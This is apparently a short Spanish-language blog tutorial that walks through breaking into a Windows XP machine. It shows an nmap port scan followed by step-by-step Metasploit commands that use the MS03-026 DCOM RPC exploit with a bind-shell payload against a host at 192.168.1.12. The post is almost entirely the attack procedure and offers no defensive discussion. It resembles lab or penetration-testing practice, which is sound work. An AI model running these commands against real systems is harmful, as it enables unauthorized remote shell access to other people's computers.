Primero, usamos nmap y vemos que puertos tiene abiertos.
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9YNIbjf1wXCui-fNgWov3cfnCuOTUZLotyGxTyrVj-o-JlbTBIOCiSu1hmdFqqu2Yhgp3FTenN11JZxKygdXQMVyoQ6Mq9I_ossHSrphvCFl3wZkIuRtK53PiOS_p4n7_PBt0IYOtw_E/s320/puertos.png)
Vemos que tiene el puerto 135, y Windows XP, así que el exploit a elegir será este: exploit/windows/dcerpc/ms03_026_dcom
Abrimos metasploit en la consola
$msfconsole
$use exploit/windows/dcerpc/ms03_026_dcom
$set TARGET 0
$show payloads
(Aquí elegimos el que queramos, yo he cogido generic/shell_bind_tcp)
$set PAYLOAD generic/shell_bind_tcp
$set RHOST 192.168.1.12
(Máquina remota a la que vamos a meter el exploit)
$exploit
Resultado:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHXkuLSTkoPiRLrc99weJ0aHvUr1Os0-AeV7erj90okPeTuzvqAmXU75-WsWjmwDfZyLI0UCgWswyMFbdNMJiv9DCvJ1HMwNLFUutofsN-nC5ONnMg4I1bHgbJi6rmiYDOlx_7bcoqDjA/s320/resultado.png)
No hay comentarios:
Publicar un comentario